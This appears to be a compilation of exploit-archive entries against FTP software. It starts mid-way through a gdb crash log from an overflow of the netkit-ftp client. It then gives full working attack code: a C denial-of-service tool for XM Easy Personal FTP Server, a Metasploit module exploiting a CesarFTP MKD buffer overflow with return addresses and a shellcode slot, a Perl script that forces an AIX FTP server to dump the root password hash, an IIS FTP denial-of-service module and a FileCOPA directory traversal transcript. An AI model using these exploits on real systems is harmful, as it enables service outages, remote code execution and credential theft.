08059000-0805a000 r--p 00011000 08:01 1573707    /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00012000 08:01 1573707    /usr/bin/netkit-ftp
0805b000-080ab000 rw-p 00000000 00:00 0          [heap]
b7dee000-b7fee000 r--p 00000000 08:01 1581098    /usr/lib/locale/locale-archive
b7fee000-b7ff0000 rw-p 00000000 00:00 0
b7ff9000-b7ffa000 r--p 002a1000 08:01 1581098    /usr/lib/locale/locale-archive
b7ffa000-b8000000 rw-p 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0x0012e416 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0xc8e    3214
edx            0x6    6
ebx            0xc8e    3214
esp            0xbfffdde4    0xbfffdde4
ebp            0xbfffddf0    0xbfffddf0
esi            0x0    0
edi            0x2f6ff4    3108852
eip            0x12e416    0x12e416 <__kernel_vsyscall+2>
eflags         0x246    [ PF ZF IF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

============================================================================================================================================================

Ubuntu 11.04 x64 and Backtrack 5 R1 (which is based on Ubuntu) crash, too:
==========================================================================

Ubuntu 11.04 x64:
=================

$ gdb /usr/bin/ftp
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Para las instrucciones de informe de errores, vea:
<http://www.gnu.org/software/gdb/bugs/>...
Leyendo símbolos desde /usr/bin/ftp...(no se encontraron símbolos de depuración)hecho.
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.5 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff76c01d7]
/lib/x86_64-linux-gnu/libc.so.6(+0xfd0f0)[0x7ffff76bf0f0]
/lib/x86_64-linux-gnu/libc.so.6(+0xfc264)[0x7ffff76be264]
/usr/bin/ftp[0x404039]
/usr/bin/ftp[0x40ec18]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xff)[0x7ffff75e0eff]
/usr/bin/ftp[0x402889]
======= Memory map: ========
00400000-00414000 r-xp 00000000 08:03 262461                             /usr/bin/netkit-ftp
00613000-00614000 r--p 00013000 08:03 262461                             /usr/bin/netkit-ftp
00614000-00616000 rw-p 00014000 08:03 262461                             /usr/bin/netkit-ftp
00616000-00687000 rw-p 00000000 00:00 0                                  [heap]
7ffff62e2000-7ffff62f7000 r-xp 00000000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff62f7000-7ffff64f6000 ---p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f6000-7ffff64f7000 r--p 00014000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f7000-7ffff64f8000 rw-p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f8000-7ffff6b82000 r--p 00000000 08:03 269561                     /usr/lib/locale/locale-archive
7ffff6b82000-7ffff6b8d000 r-xp 00000000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6b8d000-7ffff6d8c000 ---p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8c000-7ffff6d8d000 r--p 0000a000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8d000-7ffff6d8e000 rw-p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8e000-7ffff6da5000 r-xp 00000000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6da5000-7ffff6fa4000 ---p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa4000-7ffff6fa5000 r--p 00016000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa5000-7ffff6fa6000 rw-p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa6000-7ffff6fa8000 rw-p 00000000 00:00 0
7ffff6fa8000-7ffff6fb0000 r-xp 00000000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff6fb0000-7ffff71af000 ---p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71af000-7ffff71b0000 r--p 00007000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b0000-7ffff71b1000 rw-p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b1000-7ffff71bd000 r-xp 00000000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff71bd000-7ffff73bc000 ---p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bc000-7ffff73bd000 r--p 0000b000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bd000-7ffff73be000 rw-p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73be000-7ffff73c0000 r-xp 00000000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff73c0000-7ffff75c0000 ---p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c0000-7ffff75c1000 r--p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c1000-7ffff75c2000 rw-p 00003000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c2000-7ffff774c000 r-xp 00000000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff774c000-7ffff794b000 ---p 0018a000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794b000-7ffff794f000 r--p 00189000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794f000-7ffff7950000 rw-p 0018d000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff7950000-7ffff7956000 rw-p 00000000 00:00 0
7ffff7956000-7ffff7996000 r-xp 00000000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7996000-7ffff7b95000 ---p 00040000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b95000-7ffff7b99000 r--p 0003f000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b99000-7ffff7b9a000 rw-p 00043000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b9a000-7ffff7bd3000 r-xp 00000000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7bd3000-7ffff7dd3000 ---p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd3000-7ffff7dd5000 r--p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd5000-7ffff7ddb000 rw-p 0003b000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7ddb000-7ffff7ddc000 rw-p 00000000 00:00 0
7ffff7ddc000-7ffff7dfd000 r-xp 00000000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7fcf000-7ffff7fd3000 rw-p 00000000 00:00 0
7ffff7ff5000-7ffff7ffb000 rw-p 00000000 00:00 0
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00020000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7ffd000-7ffff7fff000 rw-p 00021000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]

Program received signal SIGABRT, Aborted.
0x00007ffff75f5d05 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
64    ../nptl/sysdeps/unix/sysv/linux/raise.c: No existe el fichero o el directorio.
    in ../nptl/sysdeps/unix/sysv/linux/raise.c
(gdb) i r
rax            0x0    0
rbx            0x0    0
rcx            0xffffffffffffffff    -1
rdx            0x6    6
rsi            0x5dea    24042
rdi            0x5dea    24042
rbp            0x7fffffffcfd0    0x7fffffffcfd0
rsp            0x7fffffffc608    0x7fffffffc608
r8             0x7ffff770d8c0    140737344755904
r9             0x400660    4195936
r10            0x8    8
r11            0x246    582
r12            0x9    9
r13            0x3a    58
r14            0x3a    58
r15            0x5    5
rip            0x7ffff75f5d05    0x7ffff75f5d05 <raise+53>
eflags         0x246    [ PF ZF IF ]
cs             0x33    51
ss             0x2b    43
ds             0x0    0
es             0x0    0
fs             0x0    0
gs             0x0    0
(gdb)

============================================================================================================================================================

Backtrack 5 R1:
===============

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7eea390]
/lib/tls/i686/cmov/libc.so.6(+0xe12ca)[0xb7ee92ca]
/lib/tls/i686/cmov/libc.so.6(+0xe07de)[0xb7ee87de]
/usr/bin/ftp[0x804b57c]
/usr/bin/ftp[0x8055abd]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e1ebd6]
/usr/bin/ftp[0x8049cb1]
======= Memory map: ========
08048000-08059000 r-xp 00000000 08:01 153580     /usr/bin/netkit-ftp
08059000-0805a000 r--p 00010000 08:01 153580     /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00011000 08:01 153580     /usr/bin/netkit-ftp
0805b000-0808a000 rw-p 00000000 00:00 0          [heap]
b7d58000-b7d75000 r-xp 00000000 08:01 1180       /lib/libgcc_s.so.1
b7d75000-b7d76000 r--p 0001c000 08:01 1180       /lib/libgcc_s.so.1
b7d76000-b7d77000 rw-p 0001d000 08:01 1180       /lib/libgcc_s.so.1
b7d88000-b7d8f000 r--s 00000000 08:01 159757     /usr/lib/gconv/gconv-modules.cache
b7d8f000-b7dce000 r--p 00000000 08:01 161313     /usr/lib/locale/en_US.utf8/LC_CTYPE
b7dce000-b7dd6000 r-xp 00000000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd6000-b7dd7000 r--p 00007000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd7000-b7dd8000 rw-p 00008000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd8000-b7deb000 r-xp 00000000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7deb000-b7dec000 r--p 00012000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7dec000-b7ded000 rw-p 00013000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7ded000-b7def000 rw-p 00000000 00:00 0
b7def000-b7df5000 r-xp 00000000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df5000-b7df6000 r--p 00006000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df6000-b7df7000 rw-p 00007000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df7000-b7e01000 r-xp 00000000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e01000-b7e02000 r--p 00009000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e02000-b7e03000 rw-p 0000a000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e03000-b7e04000 rw-p 00000000 00:00 0
b7e04000-b7e06000 r-xp 00000000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e06000-b7e07000 r--p 00001000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e07000-b7e08000 rw-p 00002000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e08000-b7f5b000 r-xp 00000000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5b000-b7f5c000 ---p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5c000-b7f5e000 r--p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5e000-b7f5f000 rw-p 00155000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5f000-b7f63000 rw-p 00000000 00:00 0
b7f63000-b7f97000 r-xp 00000000 08:01 1200       /lib/libncurses.so.5.7
b7f97000-b7f98000 ---p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f98000-b7f9a000 r--p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f9a000-b7f9b000 rw-p 00036000 08:01 1200       /lib/libncurses.so.5.7
b7f9b000-b7fca000 r-xp 00000000 08:01 1267       /lib/libreadline.so.6.1
b7fca000-b7fcb000 r--p 0002e000 08:01 1267       /lib/libreadline.so.6.1
b7fcb000-b7fce000 rw-p 0002f000 08:01 1267       /lib/libreadline.so.6.1
b7fce000-b7fcf000 rw-p 00000000 00:00 0
b7fdc000-b7fe2000 rw-p 00000000 00:00 0
b7fe2000-b7fe3000 r-xp 00000000 00:00 0          [vdso]
b7fe3000-b7ffe000 r-xp 00000000 08:01 1123       /lib/ld-2.11.1.so
b7ffe000-b7fff000 r--p 0001a000 08:01 1123       /lib/ld-2.11.1.so
b7fff000-b8000000 rw-p 0001b000 08:01 1123       /lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0xb7fe2422 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0x659    1625
edx            0x6    6
ebx            0x659    1625
esp            0xbfffdbfc    0xbfffdbfc
ebp            0xbfffdc08    0xbfffdc08
esi            0x0    0
edi            0xb7f5dff4    -1208623116
eip            0xb7fe2422    0xb7fe2422 <__kernel_vsyscall+2>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

Another Linux distribution did not crash; here is the example with Slackware 12:
================================================================================

Slackware 12:
=============

root@sl4ck1e:~# ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sorry, input line too long

ftp>



Ubuntu versions 11.04 and below ftp client local buffer overflow crash proof of concept exploit.

Jonathan Salwan/XM Easy Personal FTP Server DoS ( na)

/*
XM Easy Personal FTP Server <= 5.7.0
Remote Denial of Service with Request (NLST)

---------------------------------------------------------------------------------------------------------
The vulnerability is caused due to an error in handling the NLST command. This can be exploited to crash 
the FTP service by sending the "NLST" with NULL argument.
---------------------------------------------------------------------------------------------------------

Author: Jonathan Salwan
Mail  : submit [AT] shell-storm.org
Web   : http://www.shell-storm.org
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int syntax(char *file)
{
  fprintf(stderr,"XM Easy Personal FTP Server <= 5.7.0\n");
  fprintf(stderr,"=>Syntax  : <%s> <ip> <port> <login> <passwd>\n",file);
  fprintf(stdout,"=>Example : %s 127.0.0.1 21 login1 password1\n",file);
  exit(0);
}

int main(int argc, char **argv)
{
  /* argv[1]..argv[4] are used below, so five arguments are required */
  if (argc < 5)
    syntax(argv[0]);

  int port = atoi(argv[2]);

  int mysocket2;
  int srv_connect;
  int sockaddr_long;

  struct sockaddr_in sockaddr_mysocket;
  memset(&sockaddr_mysocket, 0, sizeof(sockaddr_mysocket));
  sockaddr_long = sizeof(sockaddr_mysocket);
  sockaddr_mysocket.sin_family = AF_INET;
  sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
  sockaddr_mysocket.sin_port = htons(port);

  char request[50];
  char answer[200];

  fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);

  mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
  if (mysocket2 == -1) {
    fprintf(stderr,"[-]FAILED SOCKET\n");
    return 1;
  }

  srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);

  if (srv_connect != -1) {
    /* read the server banner */
    memset(answer,0,200);
    recv(mysocket2,answer,sizeof(answer),0);

    /* snprintf bounds the command so a long login cannot overflow request[] */
    snprintf(request, sizeof(request), "USER %s\r\n", argv[3]);
    if (send(mysocket2,request,strlen(request),0) == -1) {
      fprintf(stderr,"[-]Send Request USER\t\t[FAILED]\n");
      shutdown(mysocket2,1);
      return 1;
    } else {
      memset(answer,0,200);
      recv(mysocket2,answer,sizeof(answer),0);
    }

    snprintf(request, sizeof(request), "PASS %s\r\n", argv[4]);
    if (send(mysocket2,request,strlen(request),0) == -1) {
      fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");
      shutdown(mysocket2,1);
      return 1;
    } else {
      memset(answer,0,200);
      recv(mysocket2,answer,sizeof(answer),0);
    }

    /* NLST with no argument is the request the advisory describes */
    snprintf(request, sizeof(request), "NLST\r\n");
    if (send(mysocket2,request,strlen(request),0) == -1) {
      fprintf(stderr,"[-]Send Request NLST\t\t[FAILED]\n");
      shutdown(mysocket2,1);
      return 1;
    }
  } else {
    fprintf(stderr,"[-]Connect\t\t[FAILED]\n");
    shutdown(mysocket2,1);
    return 1;
  }

  shutdown(mysocket2,1);

  fprintf(stdout,"[+]Done! %s has been Crashed\n", argv[1]);
  return 0;
}



XM Easy Personal FTP Server versions 5.7.0 and below NLST remote denial of service exploit.

c0rrupt/CesarFTP099g-pm.txt ( na)

##
#---ORIGINAL CREDITS TO h07 FOR FINDING THIS VULN---
# Ported to metasploit by c0rrupt
# ~ f34r.us ~
##

package Msf::Exploit::cesarftp_mkd;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
  'Name'     => 'CesarFTP 0.99g  Buffer Overflow',
  'Version'  => '$Revision: 1.3 $',
  'Authors'  => [ 'c0rrupt [at] f34r [dot] us', ],

  'Arch'  => [ 'x86' ],
  'OS'    => [ 'win32', 'win2000', 'winxp' ],
  'Priv'  => 0,

  'AutoOpts'  => { 'EXITFUNC' => 'seh' },
  'UserOpts'  =>
    {
    'RHOST' =>  [1, 'ADDR', 'The target address'],
    'RPORT' =>  [1, 'PORT', 'The target port', 21],
    'USER'  =>  [1, 'USER', 'Login name'],
    'PASS'  =>  [1, 'PASS', 'Password'],
    },

  'Payload'  =>
    {
    'Space' => 325,
    'BadChars'  => "\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c",
    },

  'Description'  =>  Pex::Text::Freeform(qq{
  This module exploits the buffer overflow found in the MKD command
  in CesarFTP 0.99g. It is required that the user be properly logged in
  before the exploit can be performed.
}),

  'Refs'  =>
    [
    ['URL',   'http://www.milw0rm.com/exploits/1906']
    ],

  'DefaultTarget' => 0,
  'Targets' =>
    [
      ['Windows XP SP2 English',       0x7746F114 ],  # comctl32  
      ['Windows XP SP0/SP1 English',   0x776606af ],
      ['Windows 2003 server sp0/xp sp1 English',  0x77798428 ],
      ['Windows 2003 server SP1 English',  0x7caa9618 ],
      ['Windows 2000 SP4 English',  0x78344dd3 ],
    ],

  'Keys'  => ['ceasarftp'],

  'DisclosureDate' => 'June 12 2006',
  };

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  return($self);
}

sub Exploit {
  my $self = shift;
  my $target_host = $self->GetVar('RHOST');
  my $target_port = $self->GetVar('RPORT');
  my $target_idx  = $self->GetVar('TARGET');
  my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  my $target      = $self->Targets->[$target_idx];
  my $user    = $self->GetVar('USER');
  my $pass    = $self->GetVar('PASS');

  my $buf = "MKD " . "\n"x671 . "A"x3 . pack('V', $target->[1]) .  $shellcode . "\x0d\x0a";

#pack('V', $target->[1]) 

#"\x23\x79\xAB\x71"

  $self->PrintLine(sprintf("[*] Trying to exploit target %s ", $target->[0]));

  my $sock = Msf::Socket::Tcp->new
    (
    'PeerAddr'  => $target_host,
    'PeerPort'  => $target_port,
    );

  if ($sock->IsError) {
    $self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
    return;
  }

  my $r = $sock->Recv(-1, 20);
  if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }

  $self->PrintLine("[*] Sending login credentials");
  $sock->Send("USER $user" . "\x0d\x0a");
  sleep(1);

  $sock->Send("PASS $pass" . "\x0d\x0a");
  sleep(1);
  $self->PrintLine("[*] Sending evil request");

  $sock->Send($buf);
  $self->PrintLine("[*] Exploit complete");

  return;
}


CesarFTP 0.99g (MKD) remote buffer overflow exploit written for Metasploit.

Kingcope/AIX5l FTP Server Remote Root Hash Disclosure ( na)

### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010

use IO::Socket;

$|=1;

print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n";
print "BY KINGCOPE\n";
print "JULY 2010\n\n";

if ($#ARGV < 1) {
  print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n";
  print "SAMPLES:\n";
  print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n";
  print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n";
  exit;
}

$trgt = $ARGV[0];

$sock = IO::Socket::INET->new(PeerAddr => $trgt,
                              PeerPort => '21',
                              Proto    => 'tcp');
die "Could not connect to $trgt: $!\n" unless $sock;
srand(time());
$port = int(rand(31337-1022)) + 1025;   # data port announced in the PORT command
$locip = $ARGV[1];
$locip =~ s/\./,/gi;                     # PORT wants the address comma separated

if ($ARGV[2] eq "") {
  $user   = "ftp";
  $passwd = "c0deb4b3\@roothash.com";   # original assigned $pass, which was never read
} else {
  $user   = $ARGV[2];
  $passwd = $ARGV[3];
}

$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";
if (fork()) {
  for ($k=0;$k<3;$k++) {
    print "*AIX EXPLOIT* POLLUTING FTPD***\n";
    print "\t$x";
    print $sock "USER root\r\n";
    $x = <$sock>;
    print "\t$x";
    print $sock "PASS sexy\r\n";
    $x = <$sock>;
    print "\t$x";
  }

  print "*AIX EXPLOIT* ACCESSING FOLDER***\n";
  print $sock "USER $user\r\n";
  $x = <$sock>;
  print "\t$x";
  print $sock "PASS $passwd\r\n";
  $x = <$sock>;
  print "\t$x";

  if ($ARGV[2] eq "") {
    print "*AIX EXPLOIT* CWD TO PUB***\n";
    print $sock "CWD pub\r\n";
    $x = <$sock>;
    print "\t$x";
  }

  print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
  $x = <$sock>;
  print "\t$x";

  print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
  print $sock "NLST ~" . "A" x 5000 . "\r\n";
  $x = <$sock>;

  while(<$sock>) {
    print;
  }

  print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
  exit;
} else {
  # child: listen on the data port given in PORT and print whatever arrives
  my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
  die "Could not create socket: $!\n" unless $servsock;
  my $new_sock = $servsock->accept();
  while(<$new_sock>) {
    print $_;
  }
  close($servsock);
}
## CHEERIO!


AIX5l with FTP server remote root hash disclosure exploit. Creates a coredump including the root user hash from /etc/security/passwd.

Kingcope/Microsoft IIS FTP Server 7.0 Stack Exhaustion ( na)

# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::Ftp
    include Msf::Auxiliary::Dos

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
            'Description'    => %q{
                This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
            },
            'Author'         => [
                    'Nikolaos "Kingcope" Rangos',  # Bug Discoverer
                    'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>'  # Metasploit Module
                    ], 
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1.0 $',
            'References'     =>
                [
                    [ 'CVE', '2009-2521'],
                    [ 'BID', '36273'],
                    [ 'OSVDB', '57753'],
                    [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
                    [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']

                ],
            'DisclosureDate' => 'Sep 03 2009'))

        register_options([
            OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
            OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com' ])
        ])
    end

    def run

        return unless connect_login

        print_status("Sending DoS packets ...")

        send_cmd_data(['ls','-R */../'],nil)   

        disconnect

        print_good("Done")

    end
end



This Metasploit module triggers a denial of service condition in the Microsoft Internet Information Services (IIS) FTP Server versions 5.0 through 7.0 via a list (ls) -R command containing a wildcard. It is especially intended for installations where the service's startup type is set to "manual".

Pawel h0wl Wyleci./FileCOPA FTP Server 6.01 directory traversal ( windows)

# Exploit title: FileCOPA FTP Server 6.01 directory traversal
# Date: 07.11.2010
# Software Link: http://www.filecopa-ftpserver.com/
# Version: 6.01
# Tested on: Windows XP SP3 Professional
# Author: Pawel h0wl Wylecial
#.::Cyber-Crime Team::. 
# http://cc-team.org
# http://h0wl.baywords.com

Details:

220-InterVations FileCOPA FTP Server Version 6.01 2nd November 2010
220 Trial Version. 30 days remaining
user anonymous
331 Password required for anonymous
pass asd
230 User anonymous logged in.
pasv
227 Entering Passive Mode (0,0,0,0,15,160)
list ..\..\
150 Opening ASCII mode data connection for file list
11-14-09  11:49PM                    0 AUTOEXEC.BAT
11-14-09  11:43PM                  211 boot.ini
04-15-08  01:00PM                 4952 Bootfont.bin
11-07-10  04:45PM       <DIR>          Config.Msi
11-14-09  11:49PM                    0 CONFIG.SYS
